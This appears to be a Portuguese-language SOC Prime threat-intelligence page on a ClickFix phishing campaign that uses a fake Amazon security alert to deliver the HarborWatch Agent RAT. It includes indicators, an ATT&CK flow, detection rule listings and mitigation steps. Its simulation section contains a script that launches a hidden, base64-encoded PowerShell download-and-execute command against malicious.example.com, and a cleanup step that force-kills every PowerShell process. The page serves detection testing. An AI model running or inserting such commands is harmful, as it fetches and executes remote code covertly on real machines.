SOC Prime Bias: Médio

09 Jun 2026 13:04 UTC
newspaper icon cofense.com

De Falsa Alerta de Segurança da Amazon à Entrega de Agente HarborWatch

Author Photo
SOC Prime Team linkedin icon Seguir
De Falsa Alerta de Segurança da Amazon à Entrega de Agente HarborWatch
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

O relatório detalha uma campanha de phishing construída em torno de um falso alerta de segurança da Amazon que engana as vítimas para executarem um comando PowerShell através de um prompt do tipo ClickFix. Esse comando baixa um executável malicioso denominado mysql.exe, que na verdade é o HarborWatch Agent RAT. Uma vez iniciado, o malware conecta-se a um servidor de comando e controle e transmite informações do host. A operação se baseia em domínios semelhantes e em um método de auto-infecção dirigido pelo usuário para evitar a detecção tradicional baseada em anexos.

Investigação

A Cofense rastreou a campanha desde o endereço de remetente falsificado através dos domínios maliciosos, o downloader PowerShell, e a carga final do malware. A análise dinâmica de mysql.exe revelou comunicação de saída com um servidor de comando e controle em 185.193.127.44 e o uso dos caminhos de API /api/agent/tasks/ and /api/heartbeat. A análise de memória também expôs o identificador HarborWatchAgent/c-1.1.1.

Mitigação

As organizações devem bloquear os domínios e endereços IP maliciosos identificados, restringir a execução do PowerShell de comandos codificados, monitorar a criação inesperada de mysql.exe no diretório Temp , e fortalecer defesas de e-mail contra a personificação de marca e alertas falsificados.

Resposta

Se esta atividade for detectada, isolar o endpoint afetado, terminar o processo HarborWatch Agent, coletar evidências forenses, e implantar bloqueio baseado em indicadores em todo o ambiente. Os usuários também devem ser alertados sobre o falso alerta de segurança da Amazon, e as proteções contra phishing devem ser atualizadas para capturar iscas semelhantes.

"graph TB %% Definições de classe classDef action fill:#99ccff classDef malware fill:#ff6666 classDef process fill:#ffcc99 classDef file fill:#cccccc %% Nós initial_access_phishing["<b>Ação</b> – <b>T1566.002 Spearphishing Link</b><br/>O e-mail parece ser da Amazon e contém um link de verificação malicioso."] class initial_access_phishing action user_execution_malicious_link["<b>Ação</b> – <b>T1204.001 Execução do Usuário: Link Malicioso</b><br/>A vítima clica no link e é levada a uma página que instrui a copiar-colar um comando PowerShell."] class user_execution_malicious_link action user_execution_copy_paste["<b>Ação</b> – <b>T1204.004 Execução do Usuário: Copiar e Colar</b><br/>O comando PowerShell copiado é executado localmente."] class user_execution_copy_paste action obfuscation_obfuscated_files["<b>Ação</b> – <b>T1027 Arquivos Obfuscados ou Informações</b> & <b>T1027.018 Unicode Invisível</b><br/>O comando PowerShell é codificado em base64 e contém caracteres Unicode ocultos."] class obfuscation_obfuscated_files action deobfuscate_decode["<b>Ação</b> – <b>T1140 Desobfuscar/Decodificar Arquivos ou Informações</b><br/>O comando decodifica a carga útil em tempo de execução."] class deobfuscate_decode action hide_artifact_hidden_window["<b>Ação</b> – <b>T1564.003 Janela Oculta</b><br/>O PowerShell é executado com -w hidden para evitar a interface do usuário."] class hide_artifact_hidden_window action ingress_tool_transfer["<b>Ação</b> – <b>T1105 Transferência de Ferramenta de Ingresso</b><br/>O script baixa um script PowerShell de segunda fase (code.txt) de um servidor remoto."] class ingress_tool_transfer action server_software_component["<b>Ação</b> – <b>T1505 Componente de Software de Servidor</b><br/>O segundo script recupera e executa uma carga útil (mysql.exe) colocada no %TEMP%."] class server_software_component action remote_access_tool["<b>Malware</b> – <b>T1219 Ferramenta de Acesso Remoto</b><br/>RAT personalizado chamado HarborWatch Agent é executado."] class remote_access_tool malware discovery_security_software["<b>Ação</b> – <b>T1518.001 Descoberta de Software de Segurança</b><br/>RAT coleta informações de software de segurança."] class discovery_security_software action discovery_hardware["<b>Ação</b> – <b>T1592.001 Descoberta de Hardware</b><br/>RAT obtém detalhes de hardware do host."] class discovery_hardware action discovery_network_appliances["<b>Ação</b> – <b>T1590.006 Dispositivos de Segurança de Rede</b><br/>RAT enumera dispositivos de segurança de rede."] class discovery_network_appliances action discovery_log_enumeration["<b>Ação</b> – <b>T1654 Enumeração de Logs</b><br/>RAT enumera logs de eventos."] class discovery_log_enumeration action discovery_threat_vendor["<b>Ação</b> – <b>T1681 Pesquisa de Dados de Fornecedor de Ameaças</b><br/>RAT procura por inteligência de ameaças."] class discovery_threat_vendor action c2_bidirectional["<b>Ação</b> – <b>T1102.002 Comunicação Bidirecional de Serviço Web</b><br/>Os dados são enviados ao servidor C2 via HTTPS."] class c2_bidirectional action c2_oneway["<b>Ação</b> – <b>T1102.003 Comunicação Unidirecional de Serviço Web</b><br/>Instruções adicionais recuperadas via HTTPS."] class c2_oneway action c2_dynamic_resolution["<b>Ação</b> – <b>T1568 Resolução Dinâmica</b><br/>RAT resolve domínios C2 em tempo de execução."] class c2_dynamic_resolution action c2_dga["<b>Ação</b> – <b>T1568.002 Algoritmos de Geração de Domínio</b><br/>Lista de domínios gerada algoritmicamente."] class c2_dga action c2_dead_drop_resolver["<b>Ação</b> – <b>T1102.001 Resolver de Ponto de Queda</b><br/>Recupera instruções C2 extras de um site de ponto-morto."] class c2_dead_drop_resolver action exfiltration_c2["<b>Ação</b> – <b>T1041 Exfiltração sobre Canal C2</b><br/>Informações coletadas exfiltradas através do mesmo canal web."] class exfiltration_c2 action exfiltration_alternative["<b>Ação</b> – <b>T1048 Exfiltração por Protocolo Alternativo</b><br/>Protocolo alternativo usado para exfiltração de dados."] class exfiltration_alternative action discovery_cloud_dashboard["<b>Ação</b> – <b>T1538 Painel de Serviços de Nuvem</b><br/>Dados exibidos em painel web em chinês (Harbor Sentinel)."] class discovery_cloud_dashboard action %% Conexões initial_access_phishing –>|leva a| user_execution_malicious_link user_execution_malicious_link –>|leva a| user_execution_copy_paste user_execution_copy_paste –>|aciona| obfuscation_obfuscated_files obfuscation_obfuscated_files –>|decodificado por| deobfuscate_decode deobfuscate_decode –>|executa| hide_artifact_hidden_window hide_artifact_hidden_window –>|baixa| ingress_tool_transfer ingress_tool_transfer –>|baixa| server_software_component server_software_component –>|executa| remote_access_tool remote_access_tool –>|executa| discovery_security_software remote_access_tool –>|executa| discovery_hardware remote_access_tool –>|executa| discovery_network_appliances remote_access_tool –>|executa| discovery_log_enumeration remote_access_tool –>|executa| discovery_threat_vendor remote_access_tool –>|comunica via| c2_bidirectional remote_access_tool –>|recebe via| c2_oneway c2_bidirectional –>|usa| c2_dynamic_resolution c2_dynamic_resolution –>|usa| c2_dga c2_oneway –>|usa| c2_dead_drop_resolver remote_access_tool –>|exfiltra via| exfiltration_c2 exfiltration_c2 –>|também pode usar| exfiltration_alternative remote_access_tool –>|reporta para| discovery_cloud_dashboard "

Fluxo de Ataque

Detecções

Padrões Possíveis de Ataques ClickFix na Linha de Comando (via cmdline)

Equipe SOC Prime
09 Jun 2026

Ver

A Possibilidade de Execução Através de Linhas de Comando PowerShell Ocultas (via cmdline)

Equipe SOC Prime
09 Jun 2026

Ver

Strings Suspeitas de Powershell (via cmdline)

Equipe SOC Prime
09 Jun 2026

Ver

Strings Suspeitas de Powershell (via powershell)

Equipe SOC Prime
09 Jun 2026

Ver

Chamada de Métodos .NET Suspeitos a partir do Powershell (via powershell)

Equipe SOC Prime
09 Jun 2026

Ver

IOCs (HashSha256) para detectar: De Alerta Falso de Segurança da Amazon para Entrega ClickFix do HarborWatch Agent de um RAT de Monitoramento Personalizado

Regras de IA SOC Prime
09 Jun 2026

Ver

IOCs (HashMd5) para detectar: De Alerta Falso de Segurança da Amazon para Entrega ClickFix do HarborWatch Agent de um RAT de Monitoramento Personalizado

Regras de IA SOC Prime
09 Jun 2026

Ver

IOCs (SourceIP) para detectar: De Alerta Falso de Segurança da Amazon para Entrega ClickFix do HarborWatch Agent de um RAT de Monitoramento Personalizado

Regras de IA SOC Prime
09 Jun 2026

Ver

IOCs (DestinationIP) para detectar: De Alerta Falso de Segurança da Amazon para Entrega ClickFix do HarborWatch Agent de um RAT de Monitoramento Personalizado

Regras de IA SOC Prime
09 Jun 2026

Ver

Execução de mysql.exe com Argumento de Senha Específico [Criação de Processo do Windows]

Regras de IA SOC Prime
09 Jun 2026

Ver

Detecção de Comunicação C2 do HarborWatch Agent [Conexão de Rede do Windows]

Regras de IA SOC Prime
09 Jun 2026

Ver

Detectar Execução do PowerShell com Ofuscação e Janela Oculta [PowerShell do Windows]

Regras de IA SOC Prime
09 Jun 2026

Ver

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter passado.

Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativas DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa do Ataque & Comandos:
    Um atacante obteve acesso ao endpoint e deseja baixar e executar uma carga maliciosa permanecendo oculto do usuário. Eles criam uma linha única de PowerShell que:

    1. Executa sem um perfil (-nop) para evitar o carregamento de perfis de usuário.
    2. Inicia em uma janela oculta (-w hidden) para evitar exposição da IU (T1564.003).
    3. Incorpora um script de shell reverso codificado em base64 para evadir a detecção simples de strings (T1027.010).
    4. Executa o script decodificado via -EncodedCommand, aproveitando o PowerShell como um binário assinado (T1218).

    A linha de comando criada corresponde aos filtros CommandLine|contains da regra Sigma, assim gerando o alerta esperado.

  • Script de Teste de Regressão:

    # -------------------------------------------------
# Execução maliciosa do PowerShell que deve acionar a regra Sigma
# -------------------------------------------------
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious.example.com/payload.ps1")'
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$cmd = "-nop -w hidden -EncodedCommand $b64"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList $cmd `
    -WindowStyle Hidden
# Fim do script

  • Comandos de Limpeza:

    # Terminar quaisquer processos PowerShell maliciosos remanescentes
Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Remover quaisquer arquivos temporários (nenhum criado neste caso)
# Excluir a variável de payload base64 da sessão (opcional)
Remove-Variable -Name b64 -ErrorAction SilentlyContinue

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente